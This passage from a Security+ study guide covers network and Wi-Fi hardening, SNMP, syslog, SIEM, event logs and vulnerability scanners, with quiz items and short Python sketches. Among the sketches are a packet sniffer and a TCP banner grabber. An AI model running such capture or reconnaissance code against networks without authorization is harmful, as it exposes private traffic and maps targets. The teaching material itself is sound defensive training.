 Harden network devices like switches, routers, and firewalls in much the same way as hosts, by keeping
them up to date and disabling unnecessary services.
 For network appliances running manufacturer firmware rather than fully-featured operating systems,
ensure the firmware is up to date and securely configured. If necessary, research third-party firmware
with additional security features.
 Ensure that management interfaces for network devices are secured against unauthorized access.
• Change default user names and passwords for all devices.
• Keep out-of-band management interfaces, such as terminal ports, physically secure.
• Configure web-based interfaces to only be accessible from internal or trusted networks, not from the
internet.
• Enable remote management only using secure protocols, such as SNMPv3 or SSH.
 Use network segmentation to control traffic through the internal network.
• Ensure that no traffic can move between segments with different security zones without passing
through a firewall or comparable security checkpoint.
• If using VLANs to segment broadcast domains, configure switch ports carefully to prevent VLAN
hopping attacks.
 Allocate network addresses carefully, and monitor each subnet for rogue devices.
 Use security features on routers and switches.
• Enable port security on Ethernet switches and MAC address filtering on WAPs.
• Enable ARP inspection to protect against ARP spoofing or poisoning attacks.
• On switches, enable DHCP snooping to protect against malicious DHCP traffic, such as rogue servers.
• On routers, configure ACLs for more detailed traffic shaping.
• Enable loop protection and flood guard features to protect against DoS attacks.
 Deploy specialized network security systems.
• Firewalls
• Content filters
• NIDS or NIPS
• Network-based antimalware
• UTM
 Use redundant security systems where appropriate. Ideally, redundant systems should be different
software from different vendors: this way, an attacker can't exploit a vendor-specific vulnerability to
bypass multiple layers of security.
 Deploy access control technologies.
• Authentication systems (Kerberos, RADIUS, etc.)
• VPN concentrators
• MAC filtering
• Posture assessments
 Utilize strong encryption for WAN or VPN connections to other trusted networks.


Securing perimeter networks


If your organization doesn't host externally accessible services, your perimeter network will be very simple:
possibly just an external firewall that blocks all unnecessary inbound traffic. Otherwise, you'll want some
sort of DMZ. Most precautions used on the internal network still apply, but you'll need to do a few things
differently.

 Open ports needed for necessary services, but keep other ports closed and services disabled.
 Never transmit sensitive data using insecure protocols.
 Configure perimeter hosts and especially bastion hosts to minimize their value to an attacker even if they
are compromised.
• Exposed hosts should hold no valuable data that isn't strictly necessary to their functions.
• Perimeter hosts should have little or no more permission on the internal network than a random internet
host would have.
 Ensure that there are strong firewall protections between the DMZ and the interior network.
 Harden any specialized security appliances designed to control traffic into interior networks.
• Proxy servers and load balancers
• VPN concentrators
• SSL accelerators
• DDoS mitigators
 Closely monitor any exposed systems for signs of intrusion.

Securing wireless access points


A typical wireless access point is a managed network appliance, much like a router or switch, but the
particulars of wireless technology mean that its security features and vulnerabilities are very different from
those of wired Ethernet devices. Wi-Fi networks with weak security should always be kept on the perimeter
network.

Exam Objective: CompTIA SY0-501 2.1.8.1, 2.1.8.2, 2.3.7.3

 Update firmware and secure management interfaces just as you would for a managed switch or router.
 Enable the strongest Wi-Fi encryption compatible with all connecting clients.
• In order from strongest to weakest, choose WPA2-AES, WPA-AES, WPA2-TKIP, or WPA-TKIP.
• WEP encryption should be considered insecure, and only used if the alternative is no encryption at all.
• If possible, upgrade or replace legacy clients that don't support strong encryption.
 WPS (Wi-Fi Protected Setup) has known vulnerabilities and should be disabled if possible.
 If possible, use 802.1X (WPA Enterprise) authentication. This will require an external authentication
system such as a RADIUS server.
 If you must use an open wireless network, make sure it can't directly access trusted networks. Configure
a VPN to allow authenticated wireless clients to securely access the network.
 Choose a unique SSID for your network: the particulars of Wi-Fi encryption mean that more common
SSIDs can be easier to hack.
 If your Wi-Fi network is for private use, disable SSID broadcast and use MAC filtering to limit what
clients can connect. These are not strong security measures, but will discourage casual attackers.
 Enable guest networks for untrusted clients.


 Especially if a WAP is designed for guest or public access, configure a captive portal requiring users to
identify themselves and accept your network usage policies.
 Place WAP antennas not only to maximize signal strength where authorized users need it, but to
minimize signal outside of physically secure areas.
• To reduce overall coverage area, reduce antenna broadcast power in WAP settings.
• To shape the coverage area, change antenna orientation, or add reflectors or unidirectional antennas.
• Verify coverage areas using a Wi-Fi analyzer.
 Perform periodic site surveys to verify Wi-Fi coverage and to look for rogue access points (see the sketch below).
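
As a small example of what a scripted site survey might look like, the Python sketch below lists the SSIDs visible to a Windows machine by calling the built-in netsh utility and flags any it doesn't recognize. The authorized SSID list is a placeholder, the sketch assumes a Windows host with a Wi-Fi adapter, and a dedicated Wi-Fi analyzer will give far more useful detail; this only illustrates the idea of comparing what's broadcasting against what you expect.

# Sketch: list visible SSIDs on a Windows host and flag unrecognized ones.
import subprocess

AUTHORIZED_SSIDS = {"CorpWiFi", "CorpGuest"}     # placeholder list of sanctioned networks

output = subprocess.run(
    ["netsh", "wlan", "show", "networks"],       # built-in Windows command; needs a Wi-Fi adapter
    capture_output=True, text=True, check=True).stdout

for line in output.splitlines():
    line = line.strip()
    if line.startswith("SSID"):                  # lines look like "SSID 1 : CorpWiFi"
        ssid = line.split(":", 1)[1].strip()
        if ssid and ssid not in AUTHORIZED_SSIDS:
            print("Unrecognized SSID seen:", ssid)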

Discussion: Network hardening


1. What is the guiding principle of network segmentation?
The key to segmentation is understanding how the network is broken up into collision domains, broadcast
domains, and subnets, and making sure that if two hosts or devices are close in the network's topology,
they also share similar security needs and have a reason to communicate directly. By contrast, if two
hosts have different security needs, communication between them should be more regulated and indirect,
even if it's permitted.
2. Describe the steps you'd take to make sure a computer on your home network was properly secure.
Answers may vary.
3. What examples have you seen of serious security incidents that resulted in part from not using defense in
depth policies?
Answers may vary.

Assessment: Hardening networks


1. A perimeter network needs most of the same security precautions as a trusted network, just with a few
extra concerns. True or false?
 True
 False

2. It's a safe assumption that an attacker with physical access to a system can compromise any other security
measures given time. True or false?
 True
 False

3. What's the most essential tool for segmenting broadcast domains? Choose the best response.
 Bridges
 Routers
 Switches
 VLANs

4. What feature primarily helps to protect against DoS attacks? Choose the best response.
 Authentication systems
 DMZ


 Loop protection
 SNMPv3

5. If there are two firewalls between the internet and the interior network, they should be from different
vendors. True or false?
 True
 False

6. What security feature is especially important for preventing rogue devices on the network? Choose the
best response.
 DMZ
 Loop protection
 Port security
 VPN

7. Which Wi-Fi feature should you disable to improve security? Choose the best response.
 802.1X
 MAC filtering
 WPA2
 WPS

8. A critical network service is hosted on a legacy server running an obsolete operating system, and you
can't replace it until next fiscal year. You just learned it is extremely vulnerable to a new worm that's
appeared on other computers on your network, but you can't update the server or install software that will
protect it. What can you place between the server and the rest of the network to protect it? Choose the
best response.
 Airgap
 Firewall
 HIDS
 NIPS


Module D: Monitoring and detection


No matter how well you harden the network, it's not a task you can do and walk away from. Even if you
continue to keep systems and software up to date and listen for IDS alerts, you're still only doing half the job.
Securing the network is an ongoing process, requiring active monitoring and continual awareness of changes
in network conditions.
You will learn:
 About system and network monitoring tools
 How to monitor network activity

Monitoring tools
As much as the network is a vector for attack, it's also key to detecting threats to your organization's
resources. Not only can you detect security problems using network security components and monitoring for
suspicious traffic, but you can use the network to centrally monitor individual hosts even for security
incidents that aren't network-based.

Exam Objective: CompTIA SY0-501 2.2.3


In addition to security-specific systems like NIDS, there are a wide variety of tools you can use in conjunction
with network administrators to watch for problems. Many of them are designed primarily to detect performance
issues or impending network failures rather than security incidents, but even these are valuable for detecting
suspicious traffic or unusual events, or include functions easily adapted to security purposes. Depending on its
exact functions, a monitoring tool might be a dedicated piece of hardware, or software installed on a network
device or host, and either way multiple functions might be combined into a single tool. Likewise, it might be a
permanent part of the network, or only temporarily attached for diagnostic purposes.

Network analyzer Captures and analyzes network traffic. Can read packet headers to determine traffic
patterns, or view protocol information in depth. Also known as a packet analyzer or
protocol analyzer.
Interface monitor Examines traffic over a specific network interface, for example one port on a router.
Usually it's one component of software which monitors an entire network device, or
even many devices across a network.
Port mirrors Ports on a switch or other network device configured to copy traffic on other links,
and forward it to a logging or analysis system.
Top talkers/listeners Analyzes the network over time to find what nodes are the most frequent
transmitters (talkers) or recipients (listeners) of data. Useful not only for measuring
normal traffic and detecting bottlenecks, but to find attack sources and targets, or to
discover unexpected traffic patterns such as those caused by a rogue server or
compromised device.
Wireless analyzers Used to measure congestion and reception on wireless networks. Also useful for mapping
coverage areas and detecting rogue APs.
SNMP management software Often used for remotely managing network devices, but just as useful for
gathering network information.
Logs Records kept by network hosts and devices about unusual, or even routine, network
events.
Syslog Collects system logs from network devices on a central server for analysis.


SIEM Security Information and Event Management software actively monitors and reports
on data collected by logging tools.
Physical monitoring tools Report on physical conditions that can affect network function, such as temperature,
humidity, or electrical power quality. Often part of overall environmental control or safety systems.

Many monitoring tools can be configured to send alerts by email or SMS when preset emergency conditions
are met, but network monitoring is always most effective when administrators keep a constant eye out for
problems.

Network analyzers
Network analyzers, by whatever name you use, are one of the most powerful and versatile tools for network
monitoring and troubleshooting. They can be hardware devices, but typically an analyzer is a software
application installed onto a host like a laptop, with its NIC set to promiscuous mode. There are a wide variety
of packet sniffing applications, including Wireshark, tcpdump, and Microsoft Message Analyzer.

Exam Objective: CompTIA SY0-501 2.2.1, 2.2.2, 2.2.14.7, 2.2.14.8, 2.2.14.9

Wireshark, a popular network analyzer

You can use an analyzer to monitor a single interface, but to maximize the traffic it can gather you should
connect it either to a monitoring port on a switch, or to a hardware tap set on a busy network segment. Either
way, packet analysis can be used for a number of tasks.
 Mapping logical network structure
 Collecting statistics on overall network activity
 Finding rogue systems
 Finding network errors and congestion
 Detecting unusual packet characteristics
 Monitoring for specific traffic types


 Detecting network attacks


 Reverse engineering proprietary protocol structures
 Finding and capturing specific data from packets
 Locating potential vulnerabilities
 Verifying network security device functions

Some network utilities, such as netcat, even allow for more complex and versatile network actions such as
file transfers and remote access.

Note: nmap and netcat are command line utilities that you can use directly, but it's easier to
accomplish many tasks by using a graphical front end tool that runs the utility itself in the background.
For example, Zenmap is a popular front-end for nmap.
As you can probably guess, the same features that make network analyzers ideal for an administrator to find
problems make it easy for an attacker or spy to illicitly gather sensitive or private information on the network.
This means they should only be installed and used with approval and oversight appropriate to network
security policies. Network administrators should likewise watch for unauthorized use of network analyzers,
both from outside and inside the network.
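
As a quick illustration of what an analyzer does under the hood, the Python sketch below captures a handful of packets and prints a one-line summary of each. It assumes the third-party Scapy library is installed and that it's run with administrative privileges and, as noted above, only with proper authorization; a full-featured tool like Wireshark or tcpdump is what you'd normally reach for.

# Sketch: capture 10 packets on the default interface and summarize them.
# Requires the Scapy library (pip install scapy) and root/administrator rights.
from scapy.all import sniff

def show(pkt):
    # summary() gives something like "Ether / IP / TCP 10.0.0.5:52100 > 10.0.0.1:https S"
    print(pkt.summary())

sniff(count=10, prn=show)    # add filter="tcp port 80" to watch only web traffic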

SNMP
Since its development in the late 1980s, SNMP has become the most popular standard for remotely
monitoring and managing network devices. An SNMP system includes several types of components.


Agent SNMP software running on a managed device. Originally managed devices were
generally network equipment such as switches, routers, or servers; but they can be
almost any IP device, including phones, cameras, and other hosts.
Manager A software application used to manage agents. The manager is sometimes called a
network management system (NMS), and the host that runs it a network management
station.
Object identifier (OID) A unique number corresponding to an object, something that can be monitored on a
managed device. For example, on a switch the up or down status of a particular interface might be an object,
as would be its rate of incoming traffic. (The actual value of an object is called a variable.)
Management Information Base (MIB) A database containing OIDs for a managed device, arranged in a
tree-like hierarchical fashion. The MIB is built into the agent, and a copy of its structure is imported into the
NMS. This allows the two to communicate clearly about the device's functions.

SNMP packets generally use UDP, on ports 161 and 162. Each consists of a header containing the SNMP
version number, the community name that defines the SNMP network, and the PDU containing the actual
SNMP communications. There are several types of PDU, which vary somewhat depending on the protocol
version, but they fall into a few common categories.

Get Manager-to-agent requests for information. A GetRequest PDU asks for the value
of a single variable or list of variables, but a GetNextRequest series or
GetBulkRequest can be used to walk through the entire MIB of a given agent
without even knowing its full contents. Also known as polling.
Set Manager-to-agent configuration commands. A SetRequest PDU changes the value
of a single variable or list of variables.
Response Agent-to-manager replies to Get or Set PDUs. Get responses report the requested
variables while Set responses acknowledge success or error conditions.
Trap Unsolicited agent-to-manager reports about variable states, usually used to report
significant changes of conditions without waiting for a GetRequest. The opposite
of polling.

SNMP polling from an NMS is a good way to view network conditions, while agents can be configured to
send notifications of problems or significant events via traps.
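
To give a feel for what a poll looks like in practice, the Python sketch below sends a GetRequest for sysDescr (OID 1.3.6.1.2.1.1.1.0) to an agent. It assumes the third-party pysnmp library and an agent that accepts the community string shown; exact module and class names vary between pysnmp releases, so treat this as an outline rather than a recipe.

# Sketch: SNMP GetRequest for sysDescr.0 using pysnmp's high-level API (assumed installed).
from pysnmp.hlapi import (SnmpEngine, CommunityData, UdpTransportTarget,
                          ContextData, ObjectType, ObjectIdentity, getCmd)

error_indication, error_status, error_index, var_binds = next(getCmd(
    SnmpEngine(),
    CommunityData("public", mpModel=1),                   # SNMPv2c community string (placeholder)
    UdpTransportTarget(("10.0.0.1", 161)),                # placeholder agent address, standard port
    ContextData(),
    ObjectType(ObjectIdentity("1.3.6.1.2.1.1.1.0"))))     # sysDescr.0

if error_indication:
    print("Poll failed:", error_indication)
else:
    for name, value in var_binds:
        print(name.prettyPrint(), "=", value.prettyPrint())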

SNMP versions
There are three primary versions of SNMP in common use. In theory, only the newest, SNMPv3, is a current
IETF standard and all older versions are obsolete. In practice, a given SNMP implementation might support
two or even all three versions.

SNMPv1 The original version of the protocol. SNMPv1 has no real security features: the community name
string serves as a very simple form of authentication analogous to a password, but since it's
transmitted in cleartext it's rather easy to compromise even if it's not easy to guess.
SNMPv2c Improves functionality and performance over v1, but uses different message formats and adds
more PDU types, so it isn't directly backwards compatible. The original SNMPv2 included
security features, but they were unpopular due to their complexity, so it was never widely
adopted. SNMPv2c includes the other v2 functions, but uses the same community name
authentication as v1.


SNMPv3 Adds full cryptographic security to the protocol functions of SNMPv2c. This version doesn't
change message formats and makes little change to the protocol itself outside of security features,
but adds options for both authentication and encryption. SNMPv3 also defines some system
elements differently for conceptual and documentation purposes. A manager and SNMP-enabled
applications are combined into an NMS SNMP entity, while an agent and its MIB are combined
into a Managed Node SNMP entity.

Syslog
Syslog is a standard by which network devices can send message logs to a common server so they can be
centrally compiled. An administrator can then compare events happening throughout the network;
alternatively, the server can be configured to send alerts when notable events occur. Syslog was developed as
far back as the 1980s, but due to lack of official publication it historically had a large number of often
incompatible implementations. It wasn't until 2009 that the IETF published it as a standardized protocol.
Syslog uses a fairly simple client-server model. Any sort of network device can operate as a syslog client,
logging operational events and sending them to the syslog server. Each message, and thus each logged entry,
consists of multiple components. Unlike SNMP, syslog can't be used to poll devices for information. Instead,
clients must be configured to send all relevant information themselves.

Header Contains unique identification for the entry, such as a timestamp along with the generating
device's hostname or IP address.
Facility Describes the type of program that generated the message. Syslog servers can be configured
to process messages from different facilities differently.
Severity level Describes the severity of a logged event on a numerical scale so that logs can be filtered by
importance.
Message Contains the name of the application or service which generated the message, as well as the
message details themselves.

Most of these are pretty self-explanatory, but severity level is particularly important for event logging in
general. Syslog defines eight levels: exactly what each means depends on what application generates them,
but they run the full spectrum from emergency messages about severe error conditions to detailed information
on normal activities that can be used to troubleshoot application functions.
Value Severity level Typical description
0 Emergency An error condition rendering the entire system unusable.

1 Alert A serious failure in a service requiring immediate action.

2 Critical A service failure which may become more severe without quick action.

3 Error An unexpected error that causes a specific operation to fail, but not its underlying
service.

4 Warning An error or problem condition that is immediately harmless or correctable but
might need user review.

5 Notice Unusual events or state changes that are not errors but not routine operations.

6 Informational Normal operational messages about routine system activities.

7 Debug Information useful for advanced troubleshooting or application debugging.


In practice, syslog can generate an enormous amount of data, especially on large networks, so the challenge in
using it is separating potentially serious incidents from more routine events. You might configure syslog to
record messages only of certain severity levels, or to send alerts to administrators if a message is severe
enough. Likewise, when reviewing logs you might filter them by severity depending on what you're looking
for. Syslog output can even feed into a more sophisticated SIEM system with automated processes to
highlight and notify you about likely problems with a minimum of manual effort.
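
Most platforms and languages can emit syslog messages directly. As a small example, the Python sketch below uses the standard library's logging module to send an Informational message to a central collector over UDP port 514; the collector address is a placeholder, and in production a host would usually rely on its local syslog daemon rather than application code.

# Sketch: send a test message to a central syslog server with Python's standard library.
import logging
import logging.handlers

handler = logging.handlers.SysLogHandler(
    address=("10.0.0.50", 514),                            # placeholder collector address, UDP 514
    facility=logging.handlers.SysLogHandler.LOG_AUTH)      # facility describes the message source

logger = logging.getLogger("demo")
logger.addHandler(handler)
logger.setLevel(logging.INFO)

logger.info("Test message: user jdoe logged in from 10.0.0.7")   # maps to severity 6 (Informational)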

SIEM
Security Information and Event Management is a software product category rather than a protocol or standard.
It's related to log management software, but compared to traditional log management it puts more emphasis
on making sure that logs are actively reviewed, including real-time analysis and automated alerts. SIEM
software varies a lot, but it tends to share common features.

Exam Objective: CompTIA SY0-501 2.1.9

Aggregation Gathers events from many sources throughout the network, including network devices, host
operating systems, and applications, and consolidates them so that they can be reviewed together.
Effective aggregation often requires additional features such as:
 Time synchronization to compensate for mismatched time settings between devices
and allow a clear timeline of events.
 Event deduplication to detect multiple instances of a single event (such as multiple
copies of one event) and display it only once in the aggregated totals.

Correlation Analyzes aggregated events in order to find useful data that might need additional human
review. In particular, correlation engines work by finding relationships and trends within a
large number of events, filtering out irrelevant data, and highlighting what is most likely to
be of interest to administrators.
Alerts Recognizes individual events or correlated trends that signify security incidents or other
time-critical issues, and alerts security personnel. Alerts can be triggered by specific events
such as system failures, or ongoing trends like individually innocuous events that might
represent a spreading worm or other network attack. They can be sent to a dashboard in the
software interface, or if more critical can be sent through other channels like email or SMS.
Log retention All aggregated logs, critical or not, can be saved for later analysis or to comply with
organizational or regulatory data retention policies.
Analysis tools Users can apply new search and correlation criteria to stored logs at any time,
performing rapid forensic analysis even on topics that real-time analysis didn't identify.
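
Commercial SIEM products hide most of this machinery, but the core idea behind correlation and alerting can be shown in a few lines of Python. The sketch below walks a list of already-aggregated log entries (an invented format with made-up data) and raises an alert when one source address accumulates several failed logins inside a short window, exactly the kind of individually innocuous events that only matter in aggregate.

# Sketch: flag sources with 5 or more failed logins inside 60 seconds.
from collections import defaultdict

# Each entry: (unix timestamp, source IP, event type) -- invented sample data.
events = [
    (1000, "203.0.113.9", "login_failure"),
    (1010, "203.0.113.9", "login_failure"),
    (1015, "10.0.0.7", "login_success"),
    (1020, "203.0.113.9", "login_failure"),
    (1030, "203.0.113.9", "login_failure"),
    (1040, "203.0.113.9", "login_failure"),
]

THRESHOLD, WINDOW = 5, 60
failures = defaultdict(list)

for timestamp, source, event_type in sorted(events):
    if event_type != "login_failure":
        continue
    failures[source].append(timestamp)
    # keep only the failures that fall inside the sliding window
    failures[source] = [t for t in failures[source] if timestamp - t <= WINDOW]
    if len(failures[source]) >= THRESHOLD:
        print(f"ALERT: {len(failures[source])} failed logins from {source} within {WINDOW}s")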

System logs
Not to be confused with syslog, system logs are kept by the operating systems of network hosts, which
generally have their own logging facilities that record system and application activities and save them for later
review. Even if the information isn't automatically compiled somewhere centrally on the network, you can
always log into the host and examine logged activities, and you should do so on a scheduled basis or whenever
you suspect a problem.
What exactly is logged and its format depends on the operating system, but in general it's similar to syslog:
any given entry has a timestamp, a generating application or service, and a severity level.

Exam Objective: CompTIA SY0-501 2.3.2, 2.3.4


One example is Event Viewer included with Windows. It has three event levels, not dissimilar to their syslog
counterparts: Information, Warning, and Error. Each event includes information such as the program or
service which generated it, the user account which was running the program, and specific information about
the event. Event Viewer actually collects entries into multiple separate logs, in two categories.


The first category is Windows logs, which collect information about system-wide events and legacy applications.

Application Events logged by specific applications. What generates an event log, and what details are
recorded, are up to the writer of the application.
Security Events related to security features, such as failed or successful logon attempts, security policy
changes, or resource use. Exactly what is logged is user-configurable. Uniquely, this log has
two "event levels": Audit Success for successful security events (like a logon with proper
credentials), and Audit Failure for unsuccessful events (like a logon with failed credentials).
Setup Events related to application installations.
System Events generated by Windows components, device drivers, and other system services. System
event types are predetermined by Windows.
Forwarded Events Events forwarded from other computers. To collect events from a remote computer, you
must configure an event subscription relationship between both systems.

The second category is Applications and Services logs. Each of these logs is specific to an application or
Windows component. While a given application or component might also write to Windows logs, it uses its
Applications and Services log file to record information that doesn't have system-wide impact. Events in these
logs are grouped into four types, based on the kind of information they represent.

Admin Events relating to a problem that either has well-defined documentation or a clear error
message troubleshooters can use to find a solution.
Operational Events related to occurrences that don't represent well-defined errors. If they're associated
with an application problem they can be used to troubleshoot, but they'll require more user
interpretation.
Analytic Events describing exactly how programs and components are operating. Analytic logs are
generated in large numbers, so are more difficult to look through without need. Hidden by
default.
Debug Events related to debugging and troubleshooting applications during development. Mostly
intended for programmers. Hidden by default.


Note: Windows Event Viewer is just one example of a logging application. Other operating systems have
their own, and many applications have their own independent logging features. While the overall
methods are similar, the precise information gathered and the terminology used may differ. For example,
access logs might be a generic term for records of user access to specific resources, while legal or
industry regulations might specify minimum standards for audit logs which track the entire process of
financial or data transactions covered by the regulation.
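
Host logs like these can also be collected programmatically rather than browsed by hand. As a minimal example, the Python sketch below shells out to the built-in wevtutil command on a Windows host to pull the five newest System log events in text form; a collection script feeding a central log server or SIEM would work along the same lines, and PowerShell's Get-WinEvent cmdlet offers similar functionality.

# Sketch: read the 5 newest System log events on a Windows host via the built-in wevtutil tool.
import subprocess

result = subprocess.run(
    ["wevtutil", "qe", "System",      # qe = query events from the System log
     "/c:5",                          # return only 5 events
     "/rd:true",                      # reverse direction: newest events first
     "/f:text"],                      # human-readable text rather than XML
    capture_output=True, text=True, check=True)

print(result.stdout)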

Placing monitoring tools


Regardless of what monitoring tools you're using on your network, you need to place them so that they'll
actually capture the information you need.

Exam Objective: CompTIA SY0-501 3.2.4.1, 3.2.4.2, 3.2.4.3, 3.2.4.12

 Some sensors, such as interface monitors and event logging systems, are built directly into devices.
 Network taps and port mirrors should be placed on chokepoints for critical traffic.
• Gather traffic from the inside interface of a firewall to see what passes through.
• Monitor all traffic to and from segments with critical servers.
 Large volumes of data make manual review difficult. Instead, they should be fed through collection
systems and into correlation engines.
 Remember that monitoring data itself is network traffic which can be lost or altered; it can also
interfere with other network traffic.
• Place collection and correlation systems in logically "central" locations relative to the devices and
sensors they monitor to minimize traffic volume.
• Ensure that routes for network monitoring services are resilient enough to let you gather data even
during high load, device failures, or network attacks.
• Regulate monitoring traffic volume to make sure that it doesn't cause congestion that interferes with
normal network traffic.
• Secure monitoring data that might be of use to an attacker, especially network analyzer output which
might contain sensitive information.
• Consider out-of-band transmission for critical or highly sensitive data.

Exercise: Viewing event logs


By default, Windows Event Viewer records a wide variety of system and application events.
Do This How & Why

1. In Windows 7, open Windows Event Viewer. You can also just type event into the search box.

a) Open the Control Panel.

b) Click System and Security, then View Event Logs. View Event Logs is under Administrative Tools.

2. Explore the Event Viewer interface. Enlarge or maximize the window as necessary.


a) In the left pane, expand the Custom Views, Windows Logs, and Applications and Services Logs folders.
Each has its own log categories. The root folder is Event Viewer (Local).

b) With the root folder still selected, examine the center pane. It contains four sections: Overview, Summary
of Administrative Events, Recently Viewed Events, and Log Summary.

c) Scroll through the Log Summary section. It has a full list of the available logs on the system, as well as
their size, time modified, retention policy, and whether each is enabled or disabled.

d) View the Summary of Administrative Events section. They're sorted by severity level. Each category
shows the number of events generated in the last hour, last day, and last 7 days.

e) Expand the Information list. Click +. Individual event types have an Event ID, source process, and the log
they're saved to.

f) On the right, examine the Actions pane. It shows the actions you can take with the current selection. In
this case, you can change viewing options, open a saved log, or connect to another computer.

3. View individual logs and entries.

a) In the Windows Logs folder, click System. Each event shows its level, time, source, event ID, and task
category.

b) Select any event from the list. Full details appear in the Preview pane at the center bottom.

c) In the Preview pane, click the Details tab. You can also view the event's properties as an expandable list
or in XML format.

d) Examine the Action pane. In addition to the earlier options, you can search events, view
the selected event's properties in a separate window, copy
them, or save selected events to an external file.

e) Right-click any column heading and choose Add/Remove Columns. You can add additional information
to the listing for searching or troubleshooting purposes.


f) Click Cancel.

g) View the Security log. Instead of Level, the Security log shows a Keywords field with
Audit Success or Audit Failure. Otherwise, it looks more or
less the same.

4. Close Event Viewer.

Network security posture


Having the right tools to monitor the network doesn't guarantee you know what to look for. Most of what you
need to do relies on watching for unusual activity and applying heightened scrutiny to parts of the network
you know are at risk, but these respectively rely on you knowing what activity is normal, and what parts of
the network are at risk. Even a signature list of known attack types is based on preexisting knowledge, just
compiled by your IDS vendor rather than yourself.
What this means is that you need to design your network's security posture based on a thorough understanding
of what the network's structure and needs are, and then keep it constantly updated based on changes in
network conditions and potential threats. Like most network-based security, the whole process closely mirrors
that of overall organizational security, but with some particular differences. One is that there's a lot more
focus on the technical details of network devices, protocols, and attack types; another is that due to the
constantly changing nature of technology, policies may need to be updated even more rapidly.
The first part is creating a baseline configuration, a policy document describing the initial settings and
functions of your freshly hardened network. It should include several elements, each reflecting the minimum
security needs that later monitoring and assessments can be compared against.
 Locations on the network of sensitive data and other valuable resources.
 Normal network usage patterns and traffic levels.
 Hardware and software configurations for each type of device on the network. These should be
consistent for devices of similar roles, and include other factors such as physical security. When
possible, pre-configured system images or easily applied security templates should be created reflecting
a baseline configuration.
 Acceptable and unacceptable network usage, including both user policies and application/traffic
guidelines.
 Applicable government or industry regulations for network security.
 Known vulnerabilities and what measures have been taken to mitigate them.

The second part is constant security monitoring of the functional network. This includes monitoring alert
systems and analyzing security logs, but it's not limited to those: you also need to perform regular
vulnerability assessments to verify that the network configuration still meets or exceeds the baseline
requirements, as well as security audits, in-depth reviews of network configuration and use that make sure
all incidents are responded to properly and that all user behavior and device configurations are compliant
with security policies.
The third part is adhering to a remediation policy. When vulnerability scans or assessments show the actual
state of the network doesn't meet the baseline, the remediation policy allows you to classify the severity of the
problem and formulate a suitable response plan. More broadly, remediation policies shouldn't only include
how to patch holes: they should also include the process for changing the baseline configuration itself when
changes in the network environment justify it.
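
A tiny example of how a baseline makes monitoring and remediation actionable: the Python sketch below compares the services actually observed on each host (for instance, parsed from a scan) against the services the baseline document allows, and reports anything extra or missing. Both data structures are invented placeholders standing in for whatever formats your baseline and scanning tools really use.

# Sketch: compare observed services on each host against the documented baseline.
baseline = {                                  # from the baseline configuration document
    "web01": {"tcp/80", "tcp/443"},
    "db01": {"tcp/1433"},
}
observed = {                                  # e.g., parsed from the latest vulnerability scan
    "web01": {"tcp/80", "tcp/443", "tcp/3389"},
    "db01": {"tcp/1433"},
}

for host, allowed in baseline.items():
    found = observed.get(host, set())
    extra = found - allowed                   # services running that the baseline doesn't permit
    missing = allowed - found                 # expected services that aren't responding
    if extra:
        print(f"{host}: unauthorized services {sorted(extra)} - candidates for remediation")
    if missing:
        print(f"{host}: expected services missing {sorted(missing)} - possible outage")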


Vulnerability scanners
There are a wide variety of vulnerability scanning tools: some just generally probe networks to find structures
and openings, some actively test known operating system vulnerabilities, and some are targeted at specific,
frequently attacked applications. They're often similar to, or the same as, the tools used by attackers to scout
out potential targets or infiltrate systems. While this is exactly the point, it also means you should never run
vulnerability scanners without the knowledge and consent of network and security administrators; it's against
nearly every network security policy and doing so could easily result in disciplinary action or even criminal
charges.

Exam Objective: CompTIA SY0-501 2.2.4, 2.2.5, 2.2.6, 2.2.7


The boundaries between a lot of different tools are pretty fuzzy: many scanning tools combine multiple
functions, and there's no universally accepted guideline for what term an application with a given feature set
will call itself. There's even a lot of overlap between monitoring tools and vulnerability scanning tools, though
you can roughly make the distinction that monitoring is the passive gathering of network information through
observation or logging applications, while scanning involves active probing at network devices. In practice,
you'll need to determine what aspects of the network you want to test, and look for a product or combination
of products with all the necessary features.

Protocol analyzer The same sort used in network monitoring. Captures and analyzes packets from the
network to determine their protocols, analyze header info, or capture data. In
scanning context, a protocol analyzer is commonly called a sniffer.
Port scanner Rapidly scans ports on a host or entire subnet, and reports whether they're blocked,
open, or hosting an active service. Port scanning works best for finding open TCP
services, but there are UDP scanners as well. Port scanners are valuable for finding
firewall issues, and rogue or unnecessary servers.
Network mapper Scans ports, but also gathers other system information about hosts on a subnet, such
as host names, operating systems, and server applications. One way network
mappers do this is by banner grabbing: reading routine packets from hosts or their
responses to normal service requests. While these packets don't contain confidential
material, if they reveal the host operating system or details on running services they
can also reveal potential vulnerabilities.
Password cracker Attempts to decipher weak passwords, usually by guessing them very rapidly. Some
are designed to repeatedly attempt to log into a service, but others are focused on
deciphering encrypted messages or password files.
Web application vulnerability tester Examines web server applications or even browsers for common
vulnerabilities.
Database vulnerability tester Scans database software for vulnerabilities.
Wireless scanner Scans for available Wi-Fi networks and analyzes their security settings. Some can
attempt to crack encryption while others just report openly visible network
information.
Configuration compliance scanner Any scanner that can compare its findings to an audit file reflecting
required security configuration details for the systems, services, or devices it scans. Any compliance issues
are listed separately from or in addition to vulnerabilities. For example, you could use a compliance scanner
to make sure that systems have correct password policies and event logging configured.
Exploitation framework A penetration testing tool rather than a vulnerability scanner. Exploitation
frameworks are designed to develop and test exploits against vulnerable systems or applications, but they
often can be used to scan more passively for vulnerabilities.


It's not hard to find a wide variety of software applications that will perform any of the above tasks. Popular
examples of comprehensive vulnerability scanners include the proprietary SAINT and Nessus, and the open
source OpenVAS.
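
Banner grabbing, mentioned above under network mappers, is simple to demonstrate. The Python sketch below connects to a single TCP port and prints whatever greeting the service volunteers; many services (SSH, SMTP, FTP) announce their product and version this way. The target address is a placeholder, and like any scanning technique this should only be pointed at systems you're authorized to test.

# Sketch: grab the greeting banner from one TCP service (e.g., SSH on port 22).
import socket

HOST, PORT = "10.0.0.10", 22          # placeholder target; SSH servers normally send a version banner

with socket.create_connection((HOST, PORT), timeout=3) as s:
    s.settimeout(3)
    try:
        banner = s.recv(1024)          # many services send a version string as soon as you connect
        print(banner.decode(errors="replace").strip())
    except socket.timeout:
        print("Service accepted the connection but sent no banner.")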

Security audits
How frequent and intensive your security audits are depends entirely on your network's needs and your
security resources. If you're managing a large network protecting a lot of valuable data, audits should be
frequent and comprehensive to make sure nothing's gone awry, but even if your security needs aren't unusual,
you still should create and adhere to a formal auditing process.
Potential elements of a security audit include:
 Review of security logs in order to find unusual activities or unreported incidents
 Review of incident response reports, both to verify that responses were appropriate and to detect
particular trends or patterns
 Review of user and administrator activities, in order to verify compliance with network policies
 Review of users and user permissions, to minimize potential for unauthorized access
